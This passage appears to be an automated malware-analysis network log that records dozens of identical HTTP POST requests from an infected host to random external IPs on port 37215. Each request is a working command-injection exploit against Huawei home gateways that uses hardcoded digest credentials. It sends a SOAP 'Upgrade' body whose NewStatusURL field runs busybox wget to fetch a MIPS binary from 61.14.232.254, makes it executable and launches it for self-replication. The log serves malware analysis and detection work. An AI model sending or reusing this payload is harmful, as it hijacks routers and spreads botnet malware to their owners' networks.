                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1231192.168.2.1356736197.4.113.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526215076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1232192.168.2.134053841.118.167.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526515961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1233192.168.2.135819241.193.154.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526632071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1234192.168.2.133781298.73.147.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526736021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1235192.168.2.1337214157.218.172.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526758909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1236192.168.2.1348892157.241.122.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526762962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1237192.168.2.1346908197.26.210.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526870012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1238192.168.2.1353510157.51.15.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526913881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1239192.168.2.1358080122.217.85.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526916981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1240192.168.2.1347712157.40.247.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528012037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
